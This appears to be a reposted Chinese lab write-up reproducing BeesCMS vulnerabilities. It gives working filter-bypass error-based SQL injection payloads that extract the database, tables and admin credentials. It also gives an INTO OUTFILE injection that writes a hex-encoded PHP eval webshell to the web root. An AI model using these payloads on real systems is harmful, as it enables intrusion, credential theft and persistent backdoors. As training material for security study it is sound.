墨者学院
漏洞复现
进入首页,看到没什么问题,用kail字典birb扫下路径(发现管理页面)
看到输入框,尝试sql注入,发现有注入漏洞
既然存在报错信息,我们就尝试报错注入,经过尝试and也被过滤了,and用an and d代替,union用un union ion代替,select用selselectect代替:
报错注入
admin' an and d extractvalue(1,concat(0x7e,(select database()),0x7e))#
爆出数据库名为dees
爆表名:
发现from、where、=也被过滤了,等号用like代替
admin’ an and d extractvalue(1,concat(0x7e,(selselectect table_name fro from m information_schema.tables wh where ere table_schema like ‘dees’ limit 0,1),0x7e))#
爆字段
admin' an and d extractvalue(1,concat(0x7e,(selselectect column_name fro from m information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e))#
修改为limit 2,1
爆值
admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_name fro from m bees_admin limit 0,1),0x7e))#
admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_password fro from m bees_admin limit 0,1),0x7e))#
md5解密出来admin。
进入后发现没有什么可以动的东西,想起提示网站位于"/var/www/html/"目录下。
上传木马
那么都不用拿到账号密码了。。。。
user=admin' un union ion selselectect 1,2,3,4,5 i into nto outoutfilefile '/var/www/html/shell.php&password=1&code=abd5&submit=true&submit.x=60&submit.y=23
测试文件上传可
下面直接写入一句话木马:
user=admin' un union ion selselectect 1,<?php @eval($_REQUEST['ABC']);?>,3,4,5 i into nto outoutfilefile '/var/www/html/1.php'&password=12&code=f333&submit=true&submit.x=49&submit.y=30
发现并没有<>被过滤了
转成16进制文章来源:https://www.toymoban.com/news/detail-613873.html
user=admin' un union ion selselectect 1,0x3c3f70687020406576616c28245f524551554553545b27414243275d293b3f3e,3,4,5 i into nto outoutfilefile
'/var/www/html/123.php'#&password=12&code=f333&submit=true&submit.x=49&submit.y=30
连接成功文章来源地址https://www.toymoban.com/news/detail-613873.html
到了这里,关于BeesCMS系统漏洞分析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!